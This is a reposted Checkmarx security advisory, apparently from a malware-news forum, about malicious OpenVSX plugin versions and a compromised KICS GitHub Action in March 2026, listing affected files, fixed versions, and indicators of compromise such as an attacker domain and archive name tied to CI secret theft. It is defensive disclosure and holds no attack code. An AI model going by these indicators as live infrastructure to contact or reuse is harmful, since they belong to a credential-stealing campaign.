Checkmarx Security Update

Sp123
24 Mar, 2026

We are writing to inform you that Checkmarx has identified a recent supply chain security incident involving the KICS open-source project, and two specific Checkmarx plugins distributed via the OpenVSX marketplace.  

Introduction to Malware Binary Triage (IMBT) Course

Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.

While we are not aware of any impact to customer data or production environments, we continue to actively investigate and will share details as they emerge.

What Happened

On March 23, 2026, at approximately 02:53 UTC, malicious versions of two plugins were published to the OpenVSX registry.


Only organizations that downloaded the following artifacts from OpenVSX today (3/23/2026) between 02:53 UTC and 15:41 UTC and ran it are potentially impacted by this incident.

  • ast-results-2.53.0.vsix
  • cx-dev-assist-1.7.0.vsix

Plugins downloaded from the VS Code Marketplace were not affected.

Current Status

  • We have identified and released new versions of the impacted plugins.
  • Please ensure that you are using these updated versions:
    • For checkmarx.cx-dev-assist – Please use version 1.10.0 and above.
    • For checkmarx.ast-results – Please use version 2.56.0 and above.
  • We are actively working with OpenVSX to remove any remaining malicious artifacts.

Recommended Actions

If you downloaded the malicious versions of either plugin (ast-results-2.53.0.vsix or cx-dev-assist-1.7.0.vsix) from OpenVSX during the affected period, we strongly recommend following these precautionary steps:

  1. Rotate all secrets and credentials accessible to CI runners during the affected period, including GitHub Personal Access Tokens (PATs), cloud service credentials, and repository or organization-level secrets.
  2. Review GitHub Actions runs, search for suspicious indicators such as references to tpcp.tar.gz, aquasecurity, or checkmarx.zone, and check for unexpected repositories like tpcp-docs. In case you spot any occurrences of these, please remove them or contact the Checkmarx Support for guidance.

KICS Open-Source Update

An issue was also identified in KICS GitHub Action on March 23, 2026. It was limited to the GitHub Action distribution between 12:58 and 16:50 UTC and the maintainers acted immediately revoking the affected tags, securing access, and preventing unauthorized changes. The issue was fully resolved by 19:24 UTC. Checkmarx KICS itself remains secure and unaffected.

Additional Guidance

We recommend that you continue adhering to your organization’s standard incident response procedures, including increased monitoring and validation of development and build environments.

Do not download the affected versions of the two plugins listed above (ast-results-2.53.0.vsix or cx-dev-assist-1.7.0.vsix).

We’re Here to Help

Our team is actively monitoring the situation and is available to support you. If you have any questions, please contact Checkmarx Support.

 We take our customers’ security very seriously and are taking steps to reinforce our processes. We will continue to provide updates as more information becomes available.

Article Link: Checkmarx Security Update

1 post - 1 participant

Read full topic



Malware Analysis, News and Indicators - Latest topics
Sp123

Sp123

"An underestimated security threat to organizations is employee apathy and burn out.‌‌"

Next Post Previous Post